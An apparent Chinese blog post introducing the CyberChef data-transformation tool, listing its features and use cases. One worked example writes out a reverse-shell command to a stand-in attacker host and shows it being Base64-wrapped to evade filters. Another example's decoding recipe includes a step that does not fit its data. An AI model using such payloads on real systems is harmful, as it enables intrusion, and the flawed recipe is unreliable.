什么是 CyberChef?
CyberChef 是英国情报机构 GCHQ 开发的开源网络安全工具,被称为"网络瑞士军刀"。一个浏览器即可运行,支持 300+ 种数据处理操作。
🔗 在线使用: https://gchq.github.io/CyberChef
📦 GitHub: https://github.com/gchq/CyberChef
核心特点
|
特点 |
说明 |
|---|---|
|
🌐 浏览器即用 |
无需安装,支持离线下载 |
|
🔧 300+ 操作 |
编码、加密、压缩、解析全覆盖 |
|
🎨 可视化管道 |
拖拽操作,串联成处理流水线 |
|
⚡ 实时处理 |
输入即变化,无需手动触发 |
|
🧅 深度嵌套 |
支持复杂多层嵌套处理 |
主要功能模块
1. 编码/解码
-
Base16/32/64/58/85/91
-
URL / HTML / Unicode
-
ASCII / Hex / Binary
2. 加密/解密
-
AES / DES / 3DES / RC4
-
RSA / ECC(椭圆曲线加密)
-
XOR / ROT13 / 凯撒密码
-
OpenSSL 加密
3. 压缩
-
Gzip / zlib / Deflate
-
Bzip2 / LZMA
-
Inflate / Deflate
4. 数据解析
-
JSON / XML / YAML
-
Hex Dump / Binary View
-
Strings 提取
-
反汇编(Disassemble)
5. 网络/协议
-
HTTP 请求构造
-
WHOIS / DNS 查询
-
MAC 地址解析
-
正则表达式匹配
6. 哈希/校验
-
MD5 / SHA1 / SHA2 系列
-
CRC32
-
HMAC
使用场景
|
场景 |
典型用法 |
|---|---|
|
CTF 竞赛 |
快速完成编码/加密类题目 |
|
逆向分析 |
解码恶意软件字符串 |
|
渗透测试 |
Payload 编码绕过 WAF |
|
日志分析 |
Hex 二进制日志解析 |
|
数据恢复 |
提取损坏文件中的数据 |
|
格式转换 |
JSON↔XML↔Hex 互转 |
|
协议调试 |
URL/Base64/Hex 互转 |
经典使用案例
案例 1: 字符串混淆还原
恶意样本中的字符串: 7b226e616d65223a2261646d696e222c2270617373223a223133333337227d
Operations:
1. From Hex → 自动识别为 Hex
2. From Base64 → 解码为 JSON
3. Parse JSON → 格式化输出
Result: {"name":"admin","pass":"13337"}
案例 2: 渗透测试 Payload 构造
原始命令: nc -e /bin/bash attacker.com 4444
Operations:
1. To Base64 → Base64 编码
2. Add prefix "bash -c {echo,..." → 包装
3. To Base64 → 最终 Payload
Result: 绕过某些过滤限制
案例 3: 检测恶意文件
1. Magic 识别文件类型
2. Extract strings → 提取字符串
3. Hash (MD5/SHA256) → 计算哈希
4. VirusTotal Lookup → 关联威胁情报
界面操作示意
实用技巧
|
技巧 |
说明 |
|---|---|
|
Magic 按钮 |
自动识别输入数据的格式类型 |
|
拖拽操作 |
从左侧拖到右侧构建管道 |
|
操作搜索 |
顶部搜索框快速定位操作 |
|
保存 Recipe |
将常用管道保存为配方文件 |
|
Branch |
同时输出多路处理结果 |
|
Fork |
对每行数据分别处理 |
下载离线版本
# 下载独立 HTML 文件
wget https://github.com/gchq/CyberChef/releases/latest/download/CyberChef.zip
# 解压后直接浏览器打开
一句话总结: CyberChef 是安全从业者必备的"万能数据转换器",能快速完成各种编码转换、加密解密、数据提取,是 CTF 和逆向分析的瑞士军刀。
扫一扫
2603
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
